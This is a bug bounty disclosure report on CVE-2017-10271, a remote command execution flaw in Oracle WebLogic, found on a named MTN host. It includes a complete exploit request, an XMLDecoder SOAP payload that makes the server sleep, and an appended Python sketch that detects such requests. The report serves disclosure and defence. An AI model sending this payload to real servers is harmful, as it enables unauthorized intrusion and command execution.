Remote OS Command Execution on Oracle Weblogic server via [CVE-2017-10271]
Critical
MTN Group
Reported by
tounsi_007
Vulnerability Details
Technical details and impact analysis
## Summary
Hello. I was able to identify an RCE vulnerability due to the outdated Oracle WebLogic instance on `https://raebilling.mtn.co.za`.
## Steps To Reproduce
* To reproduce, launch this request with BurpSuite
* This request to the `https://raebilling.mtn.co.za/wls-wsat/CoordinatorPortType` will trigger a sleep for 15 seconds (the same applies for 20 seconds, 40 seconds):
```
POST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1
Host: raebilling.mtn.co.za
Content-Length: 426
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java class="java.beans.XMLDecoder">
<object class="java.lang.Thread" method="sleep">
<long>40000</long>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
```
==**POC:**== {F736913} {F736912} {F736915}
## Suggested Mitigation/Remediation Actions
* Patching WebLogic to the recent version will fix the issue.
## Impact
**This vulnerability allows an unauthenticated attacker:**
* To perform Remote OS Command Execution.
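For defenders, the request above has a recognisable shape: a POST under `/wls-wsat/` whose SOAP `WorkContext` header carries a serialized `<java>` element. The following detection sketch is an added example, not part of the original report; the function name `inspect_request`, the finding strings and the sample input are assumptions made for illustration, and paths are assumed to be normalised before they are passed in.

```python
import re
import xml.etree.ElementTree as ET

WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"  # namespace seen in the report's request
WLS_WSAT = re.compile(r"^/wls-wsat/", re.IGNORECASE)

def inspect_request(method, path, body):
    """Return findings for one HTTP request; an empty list means nothing was flagged."""
    if method.upper() != "POST" or not WLS_WSAT.match(path):
        return []
    findings = ["POST to wls-wsat endpoint"]
    if "<!DOCTYPE" in body.upper():
        # Do not let the detector itself parse sender-supplied DTDs/entities.
        return findings + ["DOCTYPE present, body not parsed"]
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        # Malformed XML: fall back to a plain substring check.
        if "<java" in body.lower():
            findings.append("unparseable body containing <java")
        return findings
    for ctx in root.iter("{%s}WorkContext" % WORKAREA_NS):
        for el in ctx.iter():
            tag = el.tag.rsplit("}", 1)[-1]  # strip any namespace prefix
            if tag == "java":
                findings.append("serialized <java> element in WorkContext header")
            elif el.get("class"):
                findings.append("class reference: %s" % el.get("class"))
    return findings

# Constructed sample with the same shape as the request shown in the report.
SAMPLE_BODY = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java class="java.beans.XMLDecoder">
<object class="java.lang.Thread" method="sleep"><long>40000</long></object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>"""

if __name__ == "__main__":
    for finding in inspect_request("POST", "/wls-wsat/RegistrationPortTypeRPC", SAMPLE_BODY):
        print(finding)
```

Any hit on the first finding alone is worth reviewing on hosts where the `wls-wsat` component is not expected to receive external traffic.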
Report Details
Additional information and metadata
State: Closed
Substate: Resolved
Weakness: OS Command Injection